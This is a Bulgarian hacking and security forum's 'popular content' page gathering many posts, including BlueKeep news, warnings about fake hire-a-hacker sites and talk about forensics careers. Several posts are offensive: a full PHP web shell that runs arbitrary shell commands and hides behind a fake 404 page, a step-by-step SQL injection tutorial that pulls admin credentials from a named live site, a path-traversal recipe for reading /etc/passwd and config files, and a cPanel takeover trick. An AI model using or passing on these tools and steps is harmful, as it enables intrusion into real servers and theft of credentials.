Jump to content
¯\_( ツ)_/¯
  • TAD GROUP are currently hiring penetration testers. Please read the topic in Career Central subforum.
  • Sponsored Ad

Leaderboard


Popular Content

Showing content with the highest reputation since 05/18/2019 in all areas

  1. 3 points
    Паника обзе организациите по целия свят преди две години – на 12 Май 2017, когато масово компютрите показваха на екраните си червеното съобщение на „WannaCry” с искане за откуп. Твърде вероятно е този сценарий да се повтори през следващите дни, седмици или месеци, ако компаниите незабавно не актуализират и защитят своите Windows системи. Причината е критична уязвимост в услугaтa за отдалечена администрация RDP, по-известна в кибернетичния свят като „BlueKeep”. В най-скоро време тя ще се превърне в мощен инструмент в ръцете на злонамерените хакери, алармираха от компанията за сигурност TAD GROUP. Идентифицираната под номер CVE-2019-0708 уязвимост засяга все още поддържаните Windows 7, Windows Server 2008 R2 и Windows Server 2008, като Microsoft публикува извънредни актуализации и за две неподдържани версии – Windows XP и Windows Server 2003. Към момента няма официална актуализация за Windows Vista, въпреки че тази версия също е засегната от уязвимостта. Windows 8 и Windows 10 не са засегнати, уточняват експертите. Компании и организации, които неглижират това предупреждение и не приложат критичната поправка, излагат на риск своите потребители и ресурси. Веднъж компромитирали машината, кибер-нападателите могат да опитат да си пробият път и към вътрешните системи на компанията. „BlueKeep ще покаже дали организациите по света са си научили урока след големите поражения през 2017 г. и са подобрили нивото си на киберсигурност”, коментира Иван Тодоров, изпълнителен директор на TAD GROUP. „Най-малкото, което трябва да правят, е поне да спазват процесите за менажиране на поправките”. Случаят „BlueKeep” силно прилича на събитията от преди две години. На 14 март 2017 г. Microsoft пусна поправки за уязвимостта в протокола SMB, като посъветва всички потребители незабавно да обновят своите Windows инсталации. Два месеца по-късно тази уязвимост стана средство за двете най-вредоносни кибератаки в историята – „WannaCry” и „NotPetya”. Агенцията за национална сигурност (NSA) на САЩ публикува съвети относно уязвимост CVE-2019-0708. Въпреки че Microsoft публикува актуализации още на 14 май, милиони машини продължават да работят все още с неактуализиран софтуер и са потенциално уязвими. Източник: technews.bg
  2. 2 points
    Лично говорих със "съпорта" (support) им, не съм срещал по глупав начин на изразяване за въпросите които го попитах Накрая ми отвърна с "Съсипваш ми вкуса на уискито", и смени темата като започна да разказва някаква история за негов приятел наркоман, направо излязох от сайта, някой "skid" го държи този сайт и си мисли че има шанс да пробие в "хакерският" бизнес, хаха.... По темата: Да, пълна измама!
  3. 1 point
    Тук вече говорим за ниво на умение "Създател на интернет"
  4. 1 point
    Доказателство, че въпреки така нареченият - fingerprint , сигурноста се заобикаля.
  5. 1 point
    Нямам време да пиша романи, а и не опичам да пиша много.... 1. Клоник на сайтове се правят лесно , то е едно на ръка... 2. Сам може да помислиш дали някой може да ти предлага дадена услуга като да се хакне даден профил примерно на фейсбуук в публично пространство. 3. @Mawri , как можеш да поемеш дадения рикс без да си се допитал до човек , които е напред в нещатата и да им дадеш , каквато и да парична сума ? Другото, което е че след като си поел дадения рикс най-малкото можеше да запазиш даден лог или да направиш screenshot. Първо, което можеше да направиш да се обърнеш към ГДБОП. Няма как някой да ти помогне без достатъчни докозателства.... Кефят ме само като видя това цигат от http://www.facebookhakvane.com/ ----------- Гарантирана анонимност на клиента 200% Аз мислех , че ще е 1000% Недей те да вярвайте да децки истори като тия "хакери". Да не се повтарям пак , виж те им каква им сигурността.... в крайна сметка всеки сам може да прецени за себе си дали да вярва или не .. Ние сме тук да подпомогнем с това , което сме запознати и в крайна сметка риска си е ваш !!! Незнам за Вас , но лично аз съм бях доста време в deep web , а там има хора дето докато цъкнеш на линк и не си скрил камерата си и ставаш известен , тоест веднага ти показват снимката. До колкото имам опита в сферата на ИТ-то през годините в deep web, ме хакваха... без значение , че бях с ТОР или с платено VPN , които и да се опитвах да си филтрира портовете , стига до роот. Само , че ползвах зомбита и така или иначе не стигнаха до моята машина о.0^ По темата: Пазате се и недейте да се доверявате на "хакери" , които публикуват глупости от сорта : " Дайте 200 лева (примерно) и ще ви намерим потрепителското име и парола" ! Не съм суперман , но се опитвам да помогна с каквото мога ! Нека да вметна нещо, което се сетих сега е че има реални сайтове , които дават добри пари за намерина на даден бъг и всичко е регално. Говорим за компани като twitter.com и така натам ... , така че ако ти са про-та ще се занимават да правят пари онлайн ,а не да предлавата такива шитове!!!!!! Take care ! Така с молба момичето , което се обърна към мен за помощ без да я пренабрегна реших да споделя писането си до мен с Вас , моля Ви имайте малко уважение ! Правя всичко това с добра цел да им помогнем , нека да обединим сили и да го направим да бъдем WhiteHaT ! Извини ме , моля те че го постнах публично , но го правя за добрата каулза , надявам се да ме разбереш !!! Mawri 0 Начало на разговор: Здравей , На кратко: имах съмнения че част от интимният ми живот е заснет от камерите в къщата на бившият ми той е компютърен спецялист и се занимава със защиата на данните на едно от големите летища в франция и просто нямам начин да се добера до инфото програмата за камерите - та тия пичове ми поискаха 500 евро за хак на камерите и 200 за gmail + 200 whatsapp , реших да пробвам с ясната нагласа, че най вероятно ще пия една студена вода , но нямах никаква друга надежда .... и така по уестерн 200 евро на иметo Premanand Pilli John - и директно блок след получаването на парите .... Вината си е моя, но ако сте в състояние да направите така че да не прецакат още 1000 човека ще е супер ! Поздрави Мариана
  6. 1 point
    Как ше платя на някви деца, които са прочели някои работи в интернет и са ги сложили в сайтчето си и вече са най-големия хакери, хахаха. Не бъдете шарани да плащате на такива малоумщини. А и къде сте видяли хакер да си предлага услугите, публично ? Аз мога да хакна фейсбук, мобилен номер, елате. Баш се рекламират като foodpanda, ама никой не ги отразява пахахах, смешна работа.
  7. 1 point
    Благодаря. Много полезна информация.
  8. 1 point
    Искам да ви обесня една малко позната тема. Както съм споменал в заглавието, как става пробивът в cpanel след шел достъп? Когато злонамереният хакерът иска да направи повече зулуми след като е качил шел в даден сайт, той може да поиска да получи още повече привилегии. Файлът /home/jertva/.contactemail се презаписва с нов мейл адрес. После се отива на забравена парола в saitjertva.com/cpanel, паролата се променя и от там вече се влиза в cpanel. Разбира се, някои хостинги са премахнали опцията - забравена парола и номерът не минава. Все пак при наличие на cpanel в 80% от случаите, методът си работи.
  9. 1 point
    Значи толкова добри хакери като тези в живота си не бях виждал. : -D Като цяло доста добре са го направили и "уж" са про-та. Ебаси как за 45 мин им намерих бъг и ме човърка дали да не ги почна...... : D Тествай те сайта им да видите какъв е ...лол Ако им репортна да ми платят ще го направя да бъде по легалния начин. Само като погледнеш http://www.facebookhakvane.com/ , видя ли нещо от сорта на "http" , направо ме ловят нерите да тествам ш*бания им бокс . За това ще си остана в сферата да бъда WhiteHaT и няма да се занимавам... Стане ли някакъв проблем с тия пишете тук .......
  10. 1 point
    Правилно е да се пише слято – киберсигурност, защото това е сложно съществително име, чиито съставки са от чужд произход и първата не се употребява като самостоятелна дума в българския език. Холандия работи вече над третата си стратегия за киберсигурност. Гарантирането на киберсигурността става все по-важно за компаниите заради увеличаващия се брой атаки срещу компютърните мрежи. Забележка: В източника е посочено само правилото, на което се подчиняват подобни думи, не и конкретното съществително. В словника са включени други думи, образувани по същия модел: киберигра, киберпространство. Източник Официален правописен речник на българския език. С., БАН, Просвета, 2012, с. 52, т. 53.4.1; с. 321.
  11. 1 point
    Реших да пусна темата за eдна популярна уязвимост LFD (Local File Disclosure) или AFD (Arbitrary File Download). Методът се exploit-ва лесно. Аз предпочитам да гледам за улеснение направо през source кода, под формата на: view-source:http://site.com/?view=/../../../../../../../etc/passwd или view-source:http://site.com/download.php?file=/../../config.php По този начин могат да се разчетат критични данни и пароли на сървъра. За какво и как може да се възползва от това, зависи от намеренията и фантазията на хакера. Ужасно много сайтове страдат от тази слабост, включително и важни такива.
  12. 1 point
    Наистина гигантска база данни за MD5 hashes. https://hashkiller.co.uk/md5-decrypter.aspx
  13. 1 point
    @NediДалече съm от форенсик, ей това е моя лист: OSCP - Offensive Security - [1] OSCE - Offensive Security - [2] OSWP - Offensive Security - [3] SexViaHex - Xipiter - [4] Practical Arm Exploitation - Xipiter - [5] SANS training - [6] Corelan Advanced Exploit Development HiTB trainings Brucon Trainings (Spring and Conference in October) KPN Academy development courses (e.g. Python dev) Click here for Ring0 - [7] iOS Exploitation - [8] Ptrace Advanced Software Exploitation -[9] Hardwear.io trainings - [10] REcon Europe - [11] OSEE - Offensive Security: Advanced Windows Exploitation - [12] Exodus Intelligence: Vulndev MasterClass - [13]
  14. 1 point
    @d3k4z ми познати от Данс и от Вътрешно все ми се оплакваха, че пари нямат нито за квалификация, нито за апаратура. Колко точно е вярно не знам, понеже аз реално не съм работил за тях, но хората определено не изглеждаха въодушевени. За САНС, звъннаха ми да отида, но така и не успях. Един приятел отиде и направи 660, и каза, че е готино. Нищо магическо, но определено си заслужава. Честно казано и Ерик (Бугенхаут - той не преподава 660, ми 560) и директорът на санс ми го препоръчваха доста, ама цяла седмица за един единствен курс рядко имам да отделя. Ако гледаш каде да хвърлиш някой лев, 511 казват че е готин и доста подобен на Project Camerashy. Другият, който всички хвалят е 610, но сега всичко е сменено (горе дол от преди няколко месеца). Има ревамп на целия контент за почти всички курсове. Ако реално ти се правят курсове и ти се лети насам натам като Work Study кажи, щото така или иначе пращам моите хора (1к вместо 6к).
  15. 1 point
    Без да права реклама но поне в практиката ми най-добре се държи www.cmd5.org има и платена секция но общо взето е и доста free.
  16. 1 point
    Рядко са вътрешно обучени форенсикс кадрите в България, а след като са били на вън доста рядко се връщат. Няма особен смисъл да работиш за 2 хиляди лева в БГ като за същото ти плащат 10 пъти повече в централна Европа. За полицията не знам, но Вътрешно министерство си имат хора с желание и опит, но отново парите са проблем и то сериозен. Принципно и почва си има, ама отново, за 2 хиляди лева кое по-напред. Да събирам буквално една година за да си платя първия SANS курс, който е 6,5к долара и евентуално да ми повишат заплатата със сто/двеста лева, или да си плащам кредита по имота...Така погледнато и след 20 години няма да има почва.
  17. 1 point
    терминал който изпълнява "Bash" команди <?php session_start(); $pass = "nullsecurity"; $aliases = array('la' => 'ls -la', 'll' => 'ls -alvhF', 'dir' => 'ls'); $banner = <<<EOF <body style="background:#000000"> <font color="white"><center><p style='text-decoration: blink'> _ _ _ _ ____ _ _ | \ | |_ _| | / ___| ___ ___ _ _ _ __(_) |_ _ _ | \| | | | | | \___ \ / _ \/ __| | | | '__| | __| | | |</font> <font color="green"> | |\ | |_| | | |___) | __/ (__| |_| | | | | |_| |_| | |_| \_|\__,_|_|_|____/ \___|\___|\__,_|_| |_|\__|\__, | |___/ ____ _ _ | __ ) _ _| | __ _ __ _ _ __(_) __ _ | _ \| | | | |/ _` |/ _` | '__| |/ _` |</font> <font color="red">| |_) | |_| | | (_| | (_| | | | | (_| | |____/ \__,_|_|\__, |\__,_|_| |_|\__,_| |___/ PHP Terminal v0.3 by LinuxMaster<br><br> ------------------------------------------------------------------------------------------------</font></center></p> <br /> <hr /> EOF; $footer = <<<EOF <center><b><font color="yellow">NullSecurity BULGARIA</font></b></center> EOF; if(isset($_GET['help'])) { ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <div style="width: 90%; overflow: scroll; overflow-x: visible; height: 365px;"> <title>NullSecurity PHP Terminal #help</title> <style type="text/css"> a { text-decoration: none; } body { font-size: 14px; } </style> </head> <body> <pre> <?php echo $banner; ?> <font color="#0194D2"> <h2>Sign in</h2> From URL bar set <i>$_GET</i> variable <b>pass</b> which is equal to your predefined password in php file. Example: <b><?php echo $_SERVER['PHP_SELF']; ?>?pass=</b><i>nullsecurity</i> <h2>Reporting bugs/suggestions</h2> For reporting bugs and/or suggestions write a topic to our <a href="http://nsc-bg.org">forum</a>. <h2>Usage</h2> Like SSH but more primitive. :( <h2>Built-in commands</h2> <b>clear</b> - clearing the output. <b>help</b> - redirecting you to help page (e.g. here). <b>logout</b> - use for logging out, after that you will be redirected to fake 404 page. <b>editfile</b> <i>./dir/somefile.php</i> - simple text editor tool <a href="<?php echo $_SERVER['PHP_SELF']; ?>">Go back...</a> </font> </pre> <hr /> <center><?php echo $footer; ?></center> </body> </html> <?php exit; } if(isset($_GET['pass']) && $_GET['pass'] == $pass) { setcookie("pass", $_GET['pass'], time() + 3600); header("Location: ".$_SERVER['PHP_SELF']); if(empty($_SESSION['output'])) { $_SESSION['output'] = ""; $_SESSION['history'] = array(); $_SESSION['user'] = rtrim(shell_exec("whoami")); $_SESSION['host'] = rtrim(shell_exec("hostname")); $_SESSION['cwd'] = rtrim(getcwd()); $_SESSION['jshistory'] = ""; } exit; } if(isset($_COOKIE['pass']) && $_COOKIE['pass'] == $pass) { if(isset($_GET['editfile']) && !empty($_GET['editfile'])) { if(isset($_POST['file'])) { $file = fopen($_GET['editfile'], "w"); if(!$file) { $message = "cant write to file: ".$_GET['editfile']; } else { fwrite($file, $_POST['file']); fclose($file); $message = "saved file: ".$_GET['editfile']; } } $file = fopen($_GET['editfile'], "r"); $dontread = false; if(!$file) { $dontread = true; $message = "cant write to file: ".$_GET['editfile']; } ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>php terminal #editing file <?php echo $_GET['editfile']; ?></title> <script type="text/javascript"> function init() { document.term.file.focus(); } </script> <style type="text/css"> a { text-decoration: none; } body { font-size: 14px; } input, textarea { display: block; } input { margin-bottom: 10px; } textarea { background-color: #000000; border-bottom: 0px solid #0194D2; border-radius: 3px; color: #0194D2; display: block; height: 365px; margin-bottom: 21px; padding: 25px; resize: none; width: 90%; -moz-box-shadow:0 0 5px 2px #0194D2; -webkit-box-shadow:0 0 5px 2px #0194D2; box-shadow:0 0 5px 2px #0194D2; } </style> </head> <body> <h2>editing file <?php echo $_GET['editfile']; ?></h2> <?php if(!empty($message)) { echo "<h3>".$message."</h3>"; } ?> <form name="term" action="<?php echo $_SERVER['PHP_SELF']."?editfile=".$_GET['editfile'];?>" method="post"> <input type="submit" name="submit" value="Save" /> <textarea name="file" rows="25" cols="25"> <?php if(!($dontread)) { echo fread($file, filesize($_GET['editfile'])); } ?> <a href="<?php echo $_SERVER['PHP_SELF'];?>">Go back...</a> </form> <hr /> <center><?php echo $footer; ?></center> </body> </html> <?php fclose($file); exit; } if(!empty($_REQUEST['input'])) { if(get_magic_quotes_gpc()) { $_REQUEST['input'] = stripslashes($_REQUEST['input']); } if(($i = array_search($_REQUEST['input'], $_SESSION['history'])) !== false) { unset($_SESSION['history'][$i]); } array_unshift($_SESSION['history'], $_REQUEST['input']); $_SESSION['output'] .= $_SESSION['user']."@".$_SESSION['host'].":".$_SESSION['cwd']."$ ".$_REQUEST['input']."\n"; } if(empty($_SESSION['history'])) { $_SESSION['jshistory'] = '""'; } else { $escaped = array_map('addslashes', $_SESSION['history']); $_SESSION['jshistory'] = '"", "' . implode('", "', $escaped) . '"'; } if(@$_REQUEST['input'] == "clear") { $_SESSION['output'] = ""; } else if(@$_REQUEST['input'] == "help") { header("Location: ".$_SERVER['PHP_SELF']."?help"); exit; } else if(@$_REQUEST['input'] == "logout") { setcookie("pass", ""); header("Location: ".$_SERVER['PHP_SELF']); $_SESSION['output'] = ""; $_SESSION['history'] = array(); $_SESSION['user'] = ""; $_SESSION['host'] = ""; $_SESSION['cwd'] = ""; $_SESSION['jshistory'] = ""; exit; } else if(ereg('^[[:blank:]]*editfile[[:blank:]]+([^;]+)$', @$_REQUEST['input'], $regs)) { if(substr($regs[1], 0, 1) == "/") { $path = $regs[1]; } else { $path = $_SESSION['cwd']."/".$regs[1]; } if(file_exists($path)) { header("Location: ".$_SERVER['PHP_SELF']."?editfile=".$path); exit; } else { $_SESSION['output'] .= "cant access/not found: ".$regs[1]."\n"; } } else if(@$_REQUEST['input'] == "cd" || @$_REQUEST['input'] == "cd ~") { $_SESSION['cwd'] = getcwd(); } else if(ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', @$_REQUEST['input'], $regs)) { if(substr($regs[1], 0, 1) == "/") { $path = $regs[1]; } else { $path = $_SESSION['cwd']."/".$regs[1]; } if(@chdir($path)) { $_SESSION['cwd'] = getcwd(); } else { $_SESSION['output'] .= "could not change to: ".$regs[1]."\n"; } } else { chdir($_SESSION['cwd']); $length = strcspn(@$_REQUEST['input'], " \t"); $token = substr(@$_REQUEST['input'], 0, $length); if(isset($aliases[$token])) { $_REQUEST['input'] = $aliases[$token].substr($_REQUEST['input'], $length); } $p = proc_open(@$_REQUEST['input'], array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io); while(!feof($io[1])) { $_SESSION['output'] .= htmlspecialchars(fgets($io[1]), ENT_COMPAT, 'UTF-8'); } while(!feof($io[2])) { $_SESSION['output'] .= htmlspecialchars(fgets($io[2]), ENT_COMPAT, 'UTF-8'); } fclose($io[1]); fclose($io[2]); proc_close($p); } ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>php terminal</title> <script type="text/javascript"> var line = 0; var chistory = new Array(<?php echo $_SESSION['jshistory']; ?>); function key(e) { if(!e) { var e = window.event; } if(e.keyCode == 38 && line < chistory.length - 1) { chistory[line] = document.term.input.value; line++; document.term.input.value = chistory[line]; } if(e.keyCode == 40 && line > 0) { chistory[line] = document.term.input.value; line--; document.term.input.value = chistory[line]; } } function init() { window.scrollTo(0, document.body.scrollHeight); document.term.setAttribute("autocomplete", "off"); document.term.input.focus(); } </script> <style type="text/css"> body { font-size: 15px; } input { width: 50%; height: 50%; margin-left: 1px; border: 0px; border-radius: 3px; -moz-box-shadow:0 0 2px 1px #0194D2; -webkit-box-shadow:0 0 2px 1px #0194D2; box-shadow:0 0 2px 1px #0194D2; } </style> </head> <body onload="init()"> <pre> <?php echo $banner; ?> <font color="#0194D2"> Type <b>clear</b> to clear the output, or type <b>help</b> to view help information. To quit type <b>logout</b>, after that you will be redirected to fake 404 page. <p><?php echo $_SESSION['output']; ?></pre> <form name="term" action="<?php echo $_SERVER['PHP_SELF'];?>" method="post"></p><br> <hr /> <br /> <font color='red'><b><?php echo $_SESSION['user']."@".$_SESSION['host'].":".$_SESSION['cwd']."$"; ?></font></b> <input type="text" name="input" onkeyup="key(event)" /> </form> <br /> <hr /> <center><?php echo $footer; ?></center></font> </body> </html> <?php } else { header($_SERVER["SERVER_PROTOCOL"]." 404 Not Found"); ?> <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL <?php echo $_SERVER['PHP_SELF']; ?> was not found on this server.</p> <hr> <address><?php echo $_SERVER['SERVER_SIGNATURE']; ?></address> </body></html></div> <?php } ?></textarea></div>
  18. 1 point
    SQL инжекция е техника на инжектиране код който използва уязвимост в сигурността срещащи се в базата данни на слой на заявление. Уязвимостта е налице когато приноса на потребителите е било неправилно филтриран. За низовите евакуационните знаци, вградени в SQL изявления или приноса на потребителите не е строго въведена и по този начин неочаквано екзекутиран. Това е пример за по-общ клас уязвимости, които могат да възникнат, когато един програмен или скриптов език е вграден в друг. SQL инжекция атаки също са известни като SQL инсерция атаки. Стъпка 1: Намерете уеб сайт, който е уязвим за атаката. Предоставям ви няколко доркове [Dorks] (Дорк-а се търси в Google). Dorks: Също така можете вие да си напишете и вашият собствен дорк ! Как да проверите дали дадена уеб страница е уязвима от тази атака ? След като изпълните 1 от дорковете и да получите най-предпочитаните резултатите от търсенето. например : http://www.aps.ai/newsstory.php?id=8 Добави ' в края на страницата. http://www.aps.ai/newsstory.php?id=8' Ако страницата връща SQL грешка, че страницата е уязвима за SQLi продължавате. http://www.aps.ai/newsstory.php?id=8 order by 2-- няма грешка http://www.aps.ai/newsstory.php?id=8 order by 6-- няма грешка http://www.aps.ai/newsstory.php?id=8 order by 7--връща грешка когато ви върне грешка примерно на 7 означава че колоните са по малко и пишете order by 6-- ако върне отново грешка при 6 значи са по малко пробвате до когато намерите броя При връщане на грешка продължаваме със следваща стъпка по интересна : http://www.aps.ai/newsstory.php?id=-8 union select 1,2,3,4,5,6-- Това което връща 2 е уязвимата колона [Column] означава че ще трябва да продалжим атаката варху нея ето ви и снимка :Д http://i.imgur.com/AaXsSFA.png Продалжаваме все на по дълбоко към целта : http://www.aps.ai/newsstory.php?id=-8 union select 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database()-- Това което виждате са таблиците http://i.imgur.com/reCOw7F.png Запазвате в тхт файл това което ви трябва примерно на мен ми трябва таблицата : tbl_admin след тази стъпка трябва да знаете и имената на колоните това става само с 2 стъпки гледайте внимателно http://www.aps.ai/newsstory.php?id=-8 union select 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_schema=database()-- http://i.imgur.com/dEdkah4.png и от тука запазете username,pass Когато погледнете малко по нагоре в темата ще видите същия код само че с техт table tables ето ви и снимка за да видите точно за какво става въпрос http://i.imgur.com/1yOLnml.png Така да продалжим напред последното което трябва да направите след всички тези стъпки е да разберете какав е потребителското име и паролата на администратора как ще го направим след като вече видяхме таблиците и колоните ви казах да запазите важната информация която ще ви потрябва за да намерите потребителско име и парола аз запазих тези неща който на мен ми трябват споделям ги и с вас име на таблицата [tbl_admin] колони : username , pass сега ще видим заедно какво ще се случи : http://www.aps.ai/newsstory.php?id=-8 union select 1,group_concat(username,0x3a,pass),3,4,5,6 from tbl_admin-- ето ги username : admin password : $t@mPs@Xa Приятно учене :) уроците са стари може да се срещнете със неработещи линкове.
  19. 1 point
    @d3k4z бъркаш incident response с forensics и GDPR няма почти нищо общо с форенсикс. Даже не знам как стигна до ISO/PCI compliance.... @kernel Относно самата тема, има почва и даже си имаме и няколко отдела, които специализират в това. Проблема е, че специализиран кадър в тази сфера няма кво да прави в България. ДАНС и техните 2 хиляди лева не стигат и на 10 процента за пълно сертифициране, камо ли за оборудване. Вътрешно министерство пък даже си умират от глад, щото и 2к са им много, а съдилищните "експерти" се съгласяват на 50 лева за "експертно" мнение. То тва е направо обидно, при положение че даже индийците взимат повече пари. Като цяло, дай му време и ще има. След като нововъведените английски регулаторни закони се вкарат в европейският съюз и стигнат до нас, ще се налага да имаме експерти по дигитални престъпления заради легалните диспути, контра-аргументи и реални нужди на страната от финасова гледна точка.
  20. 1 point
    Смятам че имаме фундаментален проблем, за да стигнем до GDRP - 1во трябва да започнем да се съобразяваме и спазваме по-генерални изисквания и закони, като например конституцията на европейския съюз, минем към утвърждаване на Rule of law,и и чак след това да се мисли за GDPR. Ако някой не ми вярва, да провери БГ CERT-a колко човека са, с какво се занимват, и общо взето какъв е benefitа от тях. И дали са запознати с GDRP. Преди 5 години на една от ISACA конференцийте по сигурост, един министър на нещо с ИТ(не му помня името, щото не мисля че заслужава) и Явор Колев се биха в гърдите с нова стратегия за Кибер Сигурност на страната и как щели да развиват сектора и да гонят престъпници и т.н. и т.н. Та тогава разясняваха за БГ CERT-a колко иноватитвен и скъп проект, бил и как ще обърне индустрията(на 360градуса, т.е. пак там откъдето са тръгнали). И ето 5 години по-късно, нищо не се е променило. Имам безкрайно много забележки и по начините по които се дават сертификати като ISO 27k и PCIDSS у нас. Ако се загледаш внимателно който са сертифициращите органи на бг компанийте може да повърнеш. Нагледен пример са Телепоинт - бях писал официално писмо относно компанията която им даде PCIDSS-a от разстояние, но без никакъв фиидбак. Ама не са само те, много такива компаний са.
  21. 0 points
    Туитър сметката на мегазвездата на Боливуд Amitabh Bachchan бе хакнат от Айилидз Тим, пропакистанска турски хакерска група. Нападателят промени профила на снимката, снимката на корицата и Twitter на акаунта на Big-B. Снимката от профила на г-н Баччан е променена на снимка на премиера на Пакистан и бивш играч на крикет, Имран Хан. Нападателят твърди, че е заловил ДМ и важни данни за звездата на Боливуд. Оттогава сметката на Amitabh Bachchan е възстановена и постовете, направени от хакерската група, са изтрити. Според Alderson, хакът е бил силно коментиран в Twitter и е един от най-големите хештеги на социалния сайт. Няколко Tweets бяха публикувани от сметката на Big-B от Ayyildiz Tim, включително анти-индийски постове. Един от длъжностите гласи: "Това е важен призив към целия свят! Ние осъждаме независимото поведение на исландската република спрямо турски футболисти. Говорим тихо, но носим голяма тояга и ви информираме за голямата кибер атака тук. ? ld? z Тим турски кибер арни +++ " Друг пост гласи: "Индийската държава, която безмилостно атакува мюсюлманите, които гладуват през месец Рамадан, атакува Умма Мухаммад в тази възраст! Индийските мюсюлмани са ни поверени от Абдулхамид." https://www.ndtv.com/india-news/amitabh-bachchan-twitter-amitabh-bachchan-twitter-account-hacked-profile-photo-shows-imran-khan-2051138
×
×
  • Create New...

Important Information

By using this site, you agree to our Terms of Use. We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.